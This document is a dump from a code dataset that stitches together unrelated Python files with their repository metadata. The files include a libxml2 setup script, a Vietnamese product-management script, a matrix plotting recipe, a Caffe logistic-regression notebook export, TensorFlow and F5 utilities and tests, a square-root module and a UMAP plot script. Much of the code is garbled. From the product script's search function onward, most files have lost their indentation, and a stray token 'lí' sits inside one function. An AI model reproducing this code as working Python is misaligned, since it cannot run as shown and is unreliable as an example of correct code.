        if not missing(dir + "/libxslt/xsltconfig.h"):
            xslt_includes=dir + "/libxslt"
            break;
    if xslt_includes == "":
        print "failed to find headers for libxslt: update includes_dir"
        with_xslt = 0
# Assemble the distutils inputs: description, pure-Python modules, C
# sources, include paths, libraries and preprocessor macros.
descr = "libxml2 package"
modules = [ 'libxml2', 'drv_libxml2' ]
if WITHDLLS:
    modules.append('libxmlmods.__init__')
c_files = ['libxml2-py.c', 'libxml.c', 'types.c' ]
includes= [xml_includes, iconv_includes]
libs = [libraryPrefix + "xml2"] + platformLibs
macros = []
if with_threads:
    macros.append(('_REENTRANT','1'))
if with_xslt == 1:
    descr = "libxml2 and libxslt package"
    if not sys.platform.startswith('win'):
        #
        # We are gonna build 2 identical shared libs with merge initializing
        # both libxml2mod and libxsltmod
        #
        c_files = c_files + ['libxslt-py.c', 'libxslt.c']
        xslt_c_files = c_files
        macros.append(('MERGED_MODULES', '1'))
    else:
        #
        # On windows the MERGED_MODULE option is not needed
        # (and does not work)
        #
        xslt_c_files = ['libxslt-py.c', 'libxslt.c', 'types.c']
    libs.insert(0, libraryPrefix + 'exslt')
    libs.insert(0, libraryPrefix + 'xslt')
    includes.append(xslt_includes)
    modules.append('libxslt')
extens=[Extension('libxml2mod', c_files, include_dirs=includes,
                  library_dirs=libdirs,
                  libraries=libs, define_macros=macros)]
if with_xslt == 1:
    extens.append(Extension('libxsltmod', xslt_c_files, include_dirs=includes,
                            library_dirs=libdirs,
                            libraries=libs, define_macros=macros))
# Write a MANIFEST listing the files to distribute, unless one exists.
if missing("MANIFEST"):
    manifest = open("MANIFEST", "w")
    manifest.write("setup.py\n")
    for file in xml_files:
        manifest.write(file + "\n")
    if with_xslt == 1:
        for file in xslt_files:
            manifest.write(file + "\n")
    manifest.close()
# When bundling private DLL copies, install the extensions inside the
# libxmlmods package and ship the DLLs alongside them as data files.
if WITHDLLS:
    ext_package = "libxmlmods"
    if sys.version >= "2.2":
        base = "lib/site-packages/"
    else:
        base = ""
    data_files = [(base+"libxmlmods",dlls)]
else:
    ext_package = None
    data_files = []
setup (name = "libxml2-python",
       # On *nix, the version number is created from setup.py.in
       # On windows, it is set by configure.js
       version = "2.7.6",
       description = descr,
       author = "Daniel Veillard",
       author_email = "veillard@redhat.com",
       url = "http://xmlsoft.org/python.html",
       licence="MIT Licence",
       py_modules=modules,
       ext_modules=extens,
       ext_package=ext_package,
       data_files=data_files,
       )
sys.exit(0)
| [
"h.sorby@auckland.ac.nz"
] | h.sorby@auckland.ac.nz |
af3fb2b3688a0e354caa5b88c3565eebf0664c0f | 77900cdd9a815caf1cd04705321ca93f5072179f | /Project/.history/product_20211026231719.py | 291ef58343af0bae5fbd6dccf33cceea045d6ea9 | [] | no_license | Bom19990111/helloword_python | 717799d994223d65de5adaeabecf396ff2bc1fb7 | 2ee2e67a60043f03c1ce4b070470c7d2dcdc72a7 | refs/heads/master | 2023-09-06T04:17:02.057628 | 2021-11-21T20:00:46 | 2021-11-21T20:00:46 | 407,063,273 | 0 | 1 | null | 2021-11-21T20:00:47 | 2021-09-16T07:18:35 | Python | UTF-8 | Python | false | false | 6,967 | py | import data as list_product
import random
# NOTE(review): this looks like a class ``__init__`` left at module level --
# it takes ``self`` but belongs to no visible class; confirm intended use.
def __init__(self, Id, Product_code, Product_name, Brand, Year, Size):
    self.Id = Id
    self.Product_code = Product_code
    self.Product_name = Product_name
    self.Brand = Brand
    self.Year = Year
    self.Size = Size
# Thêm sản phẩm
def AddProduct():
    """Interactively read one product record, append it to the shared list,
    and optionally recurse to add another (prompts are in Vietnamese)."""
    print("THÊM SẢN PHẨM")
    product = {
        "Id": "",
        "Product_code": "",
        "Product_name": "",
        "Brand": "",
        "Price": "",
        "Year": "",
        "Quantity": "",
        "Size": ""
    }
    print("Nhập ID sản phẩm:")
    Id = int(input())
    # Re-prompt until the entered Id is not already taken.
    while True:
        student = FindProductDuplicate(Id)
        if student != False:
            print("ID đã tồn tại, vui lòng nhập lại ID:")
            Id = int(input())
        else:
            break
    product['Id'] = Id
    # Randomly generated product code: "HKSP" + zero-padded 2-digit number.
    code_product = random.randint(1, 99)
    str_id = "HKSP"
    if code_product <= 9:
        str_id += "0" + str(code_product)
    else:
        str_id += str(code_product)
    product["Product_code"] = str_id
    print("Nhập tên sản phẩm: ")
    product['Product_name'] = input()
    print("Nhập thương hiệu sản phẩm: ")
    product['Brand'] = input()
    print("Nhập giá sản phẩm: ")
    product['Price'] = float(input())
    print("Nhập năm sản xuất: ")
    product['Year'] = int(input())
    print("Nhập số lượng: ")
    product['Quantity'] = int(input())
    print("Nhập size giày: ")
    product['Size'] = input()
    list_product.list_product.append(product)
    # Offer to enter another record; recursion acts as the input loop.
    answer = input("Bạn có muốn nhập tiếp không? Y/N ")
    if answer == "y" or answer == "Y":
        AddProduct()
# Tìm kiếm ID trùng lặp
def FindProductDuplicate(Id):
    """Locate a product by its Id in the shared product list.

    Returns ``[index, product_dict]`` when found, otherwise ``False``.
    """
    for index, item in enumerate(list_product.list_product):
        if item['Id'] == Id:
            return [index, item]
    return False
# Hiển thị tất cả sản phẩm
def ShowAllProduct():
    """Print every product in the shared list, one labelled block per record."""
    print("*** HIỂN THỊ TẤT CẢ SẢN PHẨM ***")
    # NOTE(review): len(...) < 0 can never be true; kept as written.
    if len(list_product.list_product) == 0 or len(list_product.list_product) < 0:
        print("Chưa có sản phẩm nào để hiển thị! ".upper())
    for i in range(0, len(list_product.list_product)):
        print("ID: ", list_product.list_product[i]['Id']),
        print("Mã sản phẩm: ", list_product.list_product[i]['Product_code']),
        print("Tên sản phẩm: ", list_product.list_product[i]['Product_name']),
        print("Thương hiệu: ", list_product.list_product[i]['Brand']),
        print("Giá: ", list_product.list_product[i]['Price']),
        print("Năm xuất bản: ", list_product.list_product[i]['Year']),
        print("Số lượng: ", list_product.list_product[i]['Quantity']),
        print("Size giày: ", list_product.list_product[i]['Size'])
        print("________________________________")
# Sửa thông tin sản phẩm
def UpdateProduct():
    """Interactively update one field of a product chosen by Id.

    NOTE(review): the helper functions are (re)defined inside the loop on
    every iteration, so the first iteration only defines them and prompts;
    a chosen action runs on the following iteration.  The loop exits only
    via the ``break`` when 0 is entered; any value outside 0-6 just
    re-prompts.  ``product[1]`` is the dict stored in the list, so the
    name/brand/price/size helpers persist their change in place even
    without an explicit write-back.
    """
    print("*** CẬP NHẬT THÔNG TIN SẢN PHẨM ***")
    print("Nhập ID sản phẩm cần sửa")
    Id = int(input())
    product = FindProductDuplicate(Id)
    if product == False:
        print("Không tìm thấy sản phẩm ID = ", Id)
    else:
        print("""Bạn muốn cập nhật mục nào ? :
        0. Thoát.
        1. Tên sản phẩm.
        2. Thương hiệu sản phẩm.
        3. Giá sản phẩm
        4. Size giày.
        5. Số lượng.
        6. Năm xuất bản. """)
        action = 0
        while action >= 0:
            if action == 1:
                UpdateProductName()
            elif action == 2:
                UpdateProductBrand()
            elif action == 3:
                UpdateProductPrice()
            elif action == 4:
                UpdateProductSize()
            elif action == 5:
                UpdateProductQuatity()
            elif action == 6:
                UpdateProductYear()
            def UpdateProductName():
                print("Nhập tên sản phẩm")
                name_product = input()
                product[1]['Product_name'] = name_product
            def UpdateProductBrand():
                print("Nhập thương hiệu của sản phẩm")
                name_product = input()
                product[1]['Brand'] = name_product
            def UpdateProductPrice():
                print("Nhập giá mới của sản phẩm")
                name_product = float(input())
                product[1]['Price'] = name_product
            def UpdateProductSize():
                print("Nhập size của sản phẩm")
                name_product = input()
                product[1]['Size'] = name_product
            def UpdateProductYear():
                print("Nhập năm sản xuất của sản phẩm")
                name_product = int(input())
                product[1]['Year'] = name_product
                # Redundant write-back: product[1] is already the list entry.
                list_product.list_product[product[0]] = product[1]
            def UpdateProductQuatity():
                print("Nhập số lượng sản phẩm")
                name_product = int(input())
                product[1]['Quantity'] = name_product
                list_product.list_product[product[0]] = product[1]
            action = int(input("Bạn chọn mục cập nhật nào? "))
            if action == 0:
                print("Không cập nhật mục nào")
                break
# Xóa sản phẩm
def DeleteProduct():
    """Prompt for a product Id and remove the matching product, if any."""
    print("*** XÓA SẢN PHẨM ***")
    print("Nhập ID sản phẩm cần xóa:")
    Id = int(input())
    product = FindProductDuplicate(Id)
    if product != False:
        # product is [index, dict]; remove the dict object from the list.
        list_product.list_product.remove(product[1])
        print("Xóa sản phẩm thành công!")
    else:
        print("Không tìm thấy sản phẩm muốn xóa!")
# Tìm kiếm sản phẩm
def FindProductByName():
lí
print("*** TÌM KIẾM SẢN PHẨM ***")
print(list_product.list_product['Product_name'])
NameProduct = str(
input("Nhập tên sản phẩm hoặc tên thương hiệu bạn muốn tìm kiếm: ")).upper()
if list_product.list_product['Product_name'].upper() in NameProduct or list_product.list_product['Brand'].upper() in NameProduct:
for i in range(0, len(list_product.list_product)):
print("ID: ", list_product.list_product[i]['Id']),
print("Mã sản phẩm: ",
list_product.list_product[i]['Product_code']),
print("Tên sản phẩm: ",
list_product.list_product[i]['Product_name']),
print("Thương hiệu: ", list_product.list_product[i]['Brand']),
print("Giá: ", list_product.list_product[i]['Price']),
print("Năm xuất bản: ", list_product.list_product[i]['Year']),
print("Số lượng: ", list_product.list_product[i]['Quantity']),
print("Size giày: ", list_product.list_product[i]['Size'])
print("________________________________")
else:
print("Không tìm thấy sản phẩm này @@".upper())
| [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
b89b38a5777080f39b5b0af78beb817fc594e3fe | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/390208_Matlablike_spy_pcolor/recipe-390208.py | af0402c8845b6bd612d208af863b90832966c331 | [
"MIT",
"Python-2.0"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,546 | py | def spy_matrix_pil(A,fname='tmp.png',cutoff=0.1,do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'spy' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
cutoff Threshold value for printing an element (default 0.1)
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> spy_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
if abs(A[i,j]) > cutoff:
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255),
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255))
img.save(fname)
return
def pcolor_matrix_pil(A,fname='tmp.png',do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'pcolor' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> pcolor_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
mina = min(min(A))
maxa = max(max(A))
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
color = get_color(A[i,j],mina,maxa)
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=color,
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=color)
img.save(fname)
return
def get_color(a,cmin,cmax):
"""\
Convert a float value to one of a continuous range of colors.
Rewritten to use recipe 9.10 from the Python Cookbook.
"""
import math
try: a = float(a-cmin)/(cmax-cmin)
except ZeroDivisionError: a=0.5 # cmax == cmin
blue = min((max((4*(0.75-a),0.)),1.))
red = min((max((4*(a-0.25),0.)),1.))
green = min((max((4*math.fabs(a-0.5)-1.,0)),1.))
return '#%1x%1x%1x' % (int(15*red),int(15*green),int(15*blue))
from Numeric import identity,Float
a = identity(10,Float)
spy_matrix_pil(a)
pcolor_matrix_pil(a,'tmp2.png')
| [
"betty@qburst.com"
] | betty@qburst.com |
9166bba17e84a36d0e3627b66fc47d717a04d0ec | d3a8892f7e8a9d7767b3d797b0274004bf53e109 | /caffe/examples/notebook/original/brewing-logreg.py | 288d437ed475c854b70fc17a5e97ba4a9b78cde9 | [
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | QI1002/machinelearning | 27d3217430c3440fce81f42e70aa88762dd9529c | 8daa4a54a5010ec702cb56b56f6373f5f09c891b | refs/heads/master | 2020-05-23T12:44:09.767397 | 2019-05-15T12:36:06 | 2019-05-15T12:36:06 | 186,762,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,606 | py | # based on Ipython Notebook script in https://github.com/QI1002/caffe/blob/master/examples/brewing-logreg.ipynb
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import os
os.chdir('..')
import sys
sys.path.insert(0, './python')
import caffe
import os
import h5py
import shutil
import tempfile
import sklearn
import sklearn.datasets
import sklearn.linear_model
import pandas as pd
X, y = sklearn.datasets.make_classification(
n_samples=10000, n_features=4, n_redundant=0, n_informative=2,
n_clusters_per_class=2, hypercube=False, random_state=0
)
# Split into train and test
X, Xt, y, yt = sklearn.cross_validation.train_test_split(X, y)
# Visualize sample of the data
ind = np.random.permutation(X.shape[0])[:1000]
df = pd.DataFrame(X[ind])
_ = pd.scatter_matrix(df, figsize=(9, 9), diagonal='kde', marker='o', s=40, alpha=.4, c=y[ind])
%%timeit
# Train and test the scikit-learn SGD logistic regression.
clf = sklearn.linear_model.SGDClassifier(
loss='log', n_iter=1000, penalty='l2', alpha=5e-4, class_weight='auto')
clf.fit(X, y)
yt_pred = clf.predict(Xt)
print('Accuracy: {:.3f}'.format(sklearn.metrics.accuracy_score(yt, yt_pred)))
# Write out the data to HDF5 files in a temp directory.
# This file is assumed to be caffe_root/examples/hdf5_classification.ipynb
dirname = os.path.abspath('./examples/hdf5_classification/data')
if not os.path.exists(dirname):
os.makedirs(dirname)
train_filename = os.path.join(dirname, 'train.h5')
test_filename = os.path.join(dirname, 'test.h5')
# HDF5DataLayer source should be a file containing a list of HDF5 filenames.
# To show this off, we'll list the same data file twice.
with h5py.File(train_filename, 'w') as f:
f['data'] = X
f['label'] = y.astype(np.float32)
with open(os.path.join(dirname, 'train.txt'), 'w') as f:
f.write(train_filename + '\n')
f.write(train_filename + '\n')
# HDF5 is pretty efficient, but can be further compressed.
comp_kwargs = {'compression': 'gzip', 'compression_opts': 1}
with h5py.File(test_filename, 'w') as f:
f.create_dataset('data', data=Xt, **comp_kwargs)
f.create_dataset('label', data=yt.astype(np.float32), **comp_kwargs)
with open(os.path.join(dirname, 'test.txt'), 'w') as f:
f.write(test_filename + '\n')
from caffe import layers as L
from caffe import params as P
def logreg(hdf5, batch_size):
# logistic regression: data, matrix multiplication, and 2-class softmax loss
n = caffe.NetSpec()
n.data, n.label = L.HDF5Data(batch_size=batch_size, source=hdf5, ntop=2)
n.ip1 = L.InnerProduct(n.data, num_output=2, weight_filler=dict(type='xavier'))
n.accuracy = L.Accuracy(n.ip1, n.label)
n.loss = L.SoftmaxWithLoss(n.ip1, n.label)
return n.to_proto()
train_net_path = 'examples/hdf5_classification/logreg_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/logreg_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/test.txt', 10)))
from caffe.proto import caffe_pb2
def solver(train_net_path, test_net_path):
s = caffe_pb2.SolverParameter()
# Specify locations of the train and test networks.
s.train_net = train_net_path
s.test_net.append(test_net_path)
s.test_interval = 1000 # Test after every 1000 training iterations.
s.test_iter.append(250) # Test 250 "batches" each time we test.
s.max_iter = 10000 # # of times to update the net (training iterations)
# Set the initial learning rate for stochastic gradient descent (SGD).
s.base_lr = 0.01
# Set `lr_policy` to define how the learning rate changes during training.
# Here, we 'step' the learning rate by multiplying it by a factor `gamma`
# every `stepsize` iterations.
s.lr_policy = 'step'
s.gamma = 0.1
s.stepsize = 5000
# Set other optimization parameters. Setting a non-zero `momentum` takes a
# weighted average of the current gradient and previous gradients to make
# learning more stable. L2 weight decay regularizes learning, to help prevent
# the model from overfitting.
s.momentum = 0.9
s.weight_decay = 5e-4
# Display the current training loss and accuracy every 1000 iterations.
s.display = 1000
# Snapshots are files used to store networks we've trained. Here, we'll
# snapshot every 10K iterations -- just once at the end of training.
# For larger networks that take longer to train, you may want to set
# snapshot < max_iter to save the network and training state to disk during
# optimization, preventing disaster in case of machine crashes, etc.
s.snapshot = 10000
s.snapshot_prefix = 'examples/hdf5_classification/data/train'
# We'll train on the CPU for fair benchmarking against scikit-learn.
# Changing to GPU should result in much faster training!
s.solver_mode = caffe_pb2.SolverParameter.CPU
return s
solver_path = 'examples/hdf5_classification/logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/logreg_solver.prototxt
from caffe import layers as L
from caffe import params as P
def nonlinear_net(hdf5, batch_size):
# one small nonlinearity, one leap for model kind
n = caffe.NetSpec()
n.data, n.label = L.HDF5Data(batch_size=batch_size, source=hdf5, ntop=2)
# define a hidden layer of dimension 40
n.ip1 = L.InnerProduct(n.data, num_output=40, weight_filler=dict(type='xavier'))
# transform the output through the ReLU (rectified linear) non-linearity
n.relu1 = L.ReLU(n.ip1, in_place=True)
# score the (now non-linear) features
n.ip2 = L.InnerProduct(n.ip1, num_output=2, weight_filler=dict(type='xavier'))
# same accuracy and loss as before
n.accuracy = L.Accuracy(n.ip2, n.label)
n.loss = L.SoftmaxWithLoss(n.ip2, n.label)
return n.to_proto()
train_net_path = 'examples/hdf5_classification/nonlinear_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/nonlinear_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/test.txt', 10)))
solver_path = 'examples/hdf5_classification/nonlinear_logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/nonlinear_logreg_solver.prototxt
# Clean up (comment this out if you want to examine the hdf5_classification/data directory).
shutil.rmtree(dirname)
| [
"alanchang544@gmail.com"
] | alanchang544@gmail.com |
832d35a685c7bd0a682533fa880372e0d17ad7b8 | 12ddeca149e1a95aa404d494a8856536c3a7022b | /mesh_tensorflow/utils.py | 8a4fc9aa67c1d2f8b7d8c4e971a75021fe2c75b3 | [
"Apache-2.0"
] | permissive | brettkoonce/mesh | bbe1c2c08aaa4ce50bd91497c122f1a9f252fb27 | 07417c92a061978f5b6ec10af5ebb6aa48de1d7e | refs/heads/master | 2020-04-08T10:29:55.910960 | 2018-11-25T02:31:42 | 2018-11-25T02:32:56 | 159,271,264 | 0 | 0 | null | 2018-11-27T03:35:58 | 2018-11-27T03:35:58 | null | UTF-8 | Python | false | false | 2,209 | py | # coding=utf-8
# Copyright 2018 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for Mesh TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import tensorflow as tf
from tensorflow.python.framework import ops
@contextlib.contextmanager
def outside_all_rewrites():
with ops.control_dependencies(None):
yield
class BalancedVariablePlacer(object):
"""Place the variable on different device and blance the memory usage."""
def __init__(self, devices, init_usage=None):
init_usage = init_usage if init_usage else [0] * len(devices)
assert len(devices) == len(init_usage)
self._mem_device_heap = list(zip(init_usage, devices))
heapq.heapify(self._mem_device_heap)
self._last_device = devices[0]
def device_function(self, var):
"""Choose a device for the input variable.
Args:
var: an Variable.
Returns:
The device for placing the var.
"""
if var.type not in ('Variable', 'VariableV2', 'VarHandleOp'):
tf.logging.debug('Place {} on last device: {}.'.format(
var.name, self._last_device))
return self._last_device
shape = tf.TensorShape(var.get_attr('shape'))
assert shape.num_elements() is not None
size = tf.DType(var.get_attr('dtype')).size
mem, device = heapq.heappop(self._mem_device_heap)
mem += shape.num_elements() * size
heapq.heappush(self._mem_device_heap, (mem, device))
tf.logging.debug('Place variable {} on {} and consumes {} Bytes.'.format(
var.name, device, mem))
self._last_device = device
return device
| [
"copybara-piper@google.com"
] | copybara-piper@google.com |
7710a9642e9f3d373a1295f5cfb9c1067f40da35 | be4892e723db5039c56f961e117cb95258168eca | /lectures/lecture6/mysqrt.py | 6c1b85a74369b42e6707344be08f3d44fe3a4d16 | [] | no_license | Physicist91/uwhpsc | 121ebef0d0cd9fd7b038f97b4cb93a1f2272844a | d3ce5217796c82b19c131a04d7aecad1b9c4bae2 | refs/heads/master | 2021-01-10T21:12:00.235642 | 2014-04-05T23:29:07 | 2014-04-05T23:29:07 | 19,096,883 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | """
Module for approximating sqrt.
This is a sample module developed in earlier lectures.
"""
def sqrt2(x, debug=False):
"""
more details.
"""
from numpy import nan
if x==0.:
return 0.
elif x<0:
print "*** Error, x must be nonnegative"
return nan
assert x>0. and type(x) is float, "Unrecognized input"
s = 1.
kmax = 100
tol = 1.e-14
for k in range(kmax):
if debug:
print "Before iteration %s, s = %20.15f" % (k,s)
s0 = s
s = 0.5 * (s + x/s)
delta_s = s - s0
if abs(delta_s / x) < tol:
break
if debug:
print "After %s iterations, s = %20.15f" % (k+1,s)
return s
def test():
from numpy import sqrt
xvalues = [0., 2., 100., 10000., 1.e-4]
for x in xvalues:
print "Testing with x = %20.15e" % x
s = sqrt2(x)
s_numpy = sqrt(x)
print " s = %20.15e, numpy.sqrt = %20.15e" \
% (s, s_numpy)
assert abs(s - s_numpy) < 1e-14, \
"Disagree for x = %20.15e" % x
if __name__ == "__main__":
print "Running test... "
test()
| [
"rjl@ned"
] | rjl@ned |
0030964604d33aa135c50d750f448c4688055868 | 3256af0d6c19732bb84b256a9f792aaf7f3d901a | /f5/bigip/tm/asm/policies/test/functional/test_session_tracking.py | 787fdfeaad06ce0b34a159e408f247c5a80fe15b | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | F5Networks/f5-common-python | 73e33ea489d989399d205077163f24ce584d83b9 | 3050df0079c2426af99b9a1b8f93d0b512468ff4 | refs/heads/development | 2023-08-29T10:11:23.713392 | 2022-09-21T02:45:03 | 2022-09-21T02:45:03 | 45,062,555 | 286 | 180 | Apache-2.0 | 2023-05-12T23:13:03 | 2015-10-27T18:48:06 | Python | UTF-8 | Python | false | false | 2,340 | py | # Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from distutils.version import LooseVersion
from f5.sdk_exception import UnsupportedOperation
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('11.6.0'),
reason='This collection is fully implemented on 11.6.0 or greater.'
)
class TestSessionTracking(object):
def test_update_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.session_tracking.update()
def test_load(self, policy):
r1 = policy.session_tracking.load()
assert r1.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is False
tmp_2 = {'enableSessionAwareness': True}
r1.modify(sessionTrackingConfiguration=tmp_2)
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is True
r2 = policy.session_tracking.load()
assert r1.kind == r2.kind
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
def test_refresh(self, policy):
r1 = policy.session_tracking.load()
assert r1.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is False
r2 = policy.session_tracking.load()
assert r1.kind == r2.kind
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
tmp_2 = {'enableSessionAwareness': True}
r2.modify(sessionTrackingConfiguration=tmp_2)
assert r2.sessionTrackingConfiguration['enableSessionAwareness'] is True
r1.refresh()
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
| [
"caphrim007@gmail.com"
] | caphrim007@gmail.com |
3dacd79b61a449dd121c4692ecef1e73c0a3611d | 779291cb83ec3cab36d8bb66ed46b3afd4907f95 | /library_strategy-wf/scripts/plot_umap_library_strategy.py | 8893a1ca40907af4f128ed47502fc90d159e6127 | [] | no_license | Shengqian95/ncbi_remap | ac3258411fda8e9317f3cdf951cc909cc0f1946e | 3f2099058bce5d1670a672a69c13efd89d538cd1 | refs/heads/master | 2023-05-22T06:17:57.900135 | 2020-11-01T17:16:54 | 2020-11-01T17:16:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,713 | py | """UMAP of Library Strategy"""
import sys
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sys.path.insert(0, "../src")
from ncbi_remap.plotting import style_use
CATEGORIES = ["RNA-Seq", "EST", "WGS", "ChIP-Seq", "Other"]
COLORS = ["C0", "C1", "C2", "C4", "lightgray"]
ZORDER = [4, 3, 2, 1, 0]
SCATTER_STYLE = dict(s=10, edgecolors="w", linewidths=0.2, rasterized=True)
def main():
style_use(snakemake.params.get("style", "sra"))
embeddings = wrangle_data()
ax = plot(embeddings)
plt.savefig(snakemake.output[0])
def wrangle_data():
labels = (
pd.read_parquet(snakemake.input.labels)
.library_strategy.squeeze()
.map(lambda x: x if x in CATEGORIES else "Other")
)
return pd.read_parquet(snakemake.input.umap).join(labels)
def plot(embeddings):
for cat, color, zorder in zip(CATEGORIES, COLORS, ZORDER):
df = embeddings.query(f"library_strategy == '{cat}'")
plt.scatter(df.UMAP1, df.UMAP2, c=color, label=cat, zorder=zorder, **SCATTER_STYLE)
ax = plt.gca()
ax.set(xlabel="UMAP 1", ylabel="UMAP 2")
sns.despine(ax=ax, left=True, bottom=True)
ax.yaxis.set_visible(False)
ax.xaxis.set_visible(False)
plt.legend(loc="upper left")
return ax
if __name__ == "__main__":
if "snakemake" not in locals() or not hasattr(snakemake, "scriptdir"):
from ncbi_remap.mock import MockSnake
snakemake = MockSnake(
input=dict(
umap="../../output/library_strategy-wf/umap_prealn_features.parquet",
labels="../../output/library_strategy-wf/sra_strategy_selection.parquet",
),
output="",
)
main()
| [
"justin.m.fear@gmail.com"
] | justin.m.fear@gmail.com |
d8ca834b99ba70263bf23cc4cca4378f4ddc1fc7 | 6aee7149a16a71389e0916de1854f4edea026c2b | /docs/conf.py | ec1c141aa03b02802683dd91900e56f31946a7a8 | [
"BSD-2-Clause"
] | permissive | orionzhou/maize | d5e3c66af285d5d3a490fe09e85f840bd033240a | 605c895c397c9f614955a6df8eed0edc553f543d | refs/heads/main | 2022-12-27T02:08:26.747564 | 2022-11-24T07:57:30 | 2022-11-24T07:57:30 | 11,537,821 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,192 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# robin documentation build configuration file, created by
# sphinx-quickstart on Sun Dec 11 23:07:57 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
